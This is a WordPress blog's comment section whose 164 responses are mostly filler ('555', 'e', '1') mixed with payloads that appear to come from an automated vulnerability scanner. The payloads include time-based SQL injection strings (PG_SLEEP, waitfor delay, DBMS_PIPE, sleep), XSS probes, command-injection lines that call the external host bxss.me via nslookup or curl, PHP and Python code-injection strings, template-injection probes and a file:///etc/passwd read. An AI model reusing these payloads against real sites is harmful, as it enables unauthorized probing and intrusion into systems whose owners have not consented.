164 Responses

1. Hi, this is a comment.
   To get started with moderating, editing, and deleting comments, please visit the Comments screen in the dashboard.
   Commenter avatars come from Gravatar.

2. e

3. 555

4. 555

5. 555

6. 555

7. 555

8. 555′”()&%cCBZ(9273)

9. 555

10. 555

11. http://bxss.me/t/xss.html?%00

12. 1DnbahDLO

13. e

14. e’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’

15. e

16. e

17. 1%2527%2522

18. 555

19. e

20. 555

21. -1″ OR 3+509-509-1=0+0+0+1 —

22. 555

23. -1); waitfor delay ‘0:0:15’ —

24. -5 OR 57=(SELECT 57 FROM PG_SLEEP(15))–

25. oOwvegqH’)) OR 43=(SELECT 43 FROM PG_SLEEP(15))–

26. 555

27. 555

28. 555

29. e

30. e'”()&%om56(9125)

31. e9016819

32. dfb__${98991*97996}__::.x

33. e%’ AND 2*3*8=6*8 AND ‘6AzW’!=’6AzW%

34. e

35. Q0KXpW4L’) OR 80=(SELECT 80 FROM PG_SLEEP(15))–

36. e

37. e

38. e

39. e

40. e

41. e

42. e

43. e'”()&%kVnm(9469)

44. 555

45. 555

46. 555

47. 555

48. 555

49. 555

50. 555

51. 555

52. 555

53. 1′>”>

54. 1

55. if(now()=sysdate(),sleep(15),0)

56. 0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z

57. 1

58. 555

59. -1); waitfor delay ‘0:0:15’ —

60. 1 waitfor delay ‘0:0:15’ —

61. AgSMkoBp’; waitfor delay ‘0:0:15’ —

62. http://bxss.me/t/xss.html?%00

63. -5 OR 688=(SELECT 688 FROM PG_SLEEP(15))–

64. 555

65. U1ahcOei

66. G6kvU1e9′ OR 341=(SELECT 341 FROM PG_SLEEP(15))–

67. 555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

68. 1′”

69. @@nedBg

70. 1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

71. 1’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’

72. @@sWrHG

73. 0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z

74. 555

75. 1

76. 1

77. 1

78. 1

79. 1

80. 1

81. 1

82. 1

83. pEHbBXsv’)) OR 625=(SELECT 625 FROM PG_SLEEP(15))–

84. 555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

85. @@KB4YA

86. 1

87. 1

88. 1

89. 1

90. 555

91. 1

92. -1 OR 2+666-666-1=0+0+0+1 —

93. -1 OR 3+533-533-1=0+0+0+1

94. -1′ OR 3+127-127-1=0+0+0+1 —

95. 1

96. |echo ictgir$()\ degcgz\nz^xyu||a #’ |echo ictgir$()\ degcgz\nz^xyu||a #|” |echo ictgir$()\ degcgz\nz^xyu||a #

97. &(nslookup -q=cname hitehmagqqlud04139.bxss.me||curl hitehmagqqlud04139.bxss.me)&’\”`0&(nslookup -q=cname hitehmagqqlud04139.bxss.me||curl hitehmagqqlud04139.bxss.me)&`’

98. file:///etc/passwd

99. 1

100. -1; waitfor delay ‘0:0:15’ —

101. 1

102. 1 waitfor delay ‘0:0:15’ —

103. http://bxss.me/t/fit.txt%3F.jpg

104. -5 OR 20=(SELECT 20 FROM PG_SLEEP(15))–

105. 1″&&sleep(27*1000)*kuyrgd&&”

106. kk0cm4Ye’ OR 122=(SELECT 122 FROM PG_SLEEP(15))–

107. 1

108. rxfSm2xy’)) OR 769=(SELECT 769 FROM PG_SLEEP(15))–

109. ;assert(base64_decode(‘cHJpbnQobWQ1KDMxMzM3KSk7’));

110. 1%2527%2522

111. 1

112. 1

113. ‘+str(__import__(“time”).sleep(9))+__import__(“socket”).gethostbyname(“hitdhqvlllwub12164.”+”bxss.me”)+’

114. 1

115. xfs.bxss.me

116. 1

117. 1

118. 1

119. 1

120. 1

121. 1

122. 1

123. 555

124. 555

125. 555

126. 555

127. $(nslookup -q=cname hitcttveyzybw8592b.bxss.me||curl hitcttveyzybw8592b.bxss.me)

128. |(nslookup -q=cname hitqwkvdoofun40359.bxss.me||curl hitqwkvdoofun40359.bxss.me)

129. 555

130. http://bxss.me/t/fit.txt?.jpg

131. 555

132. S76cK0Qm’; waitfor delay ‘0:0:15’ —

133. httgskoh’) OR 249=(SELECT 249 FROM PG_SLEEP(15))–

134. 555

135. ${@print(md5(31337))}\

136. @@A0hBp

137. 555

138. wp-comments-post.php

139. http://hitaqdnygqjoo.bxss.me/

140. 555

141. 555′”()&%HmcF(9320)

142. 555

143. 555

144. 555

145. 555

146. 555

147. 555

148. 555

149. 555

150. 555

151. 555

152. 555

153. (select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/

154. -5) OR 27=(SELECT 27 FROM PG_SLEEP(15))–

155. 1

156. 1

157. 1

158. 555

159. 1

160. 1

161. 555

162. 1

163. 1

164. 1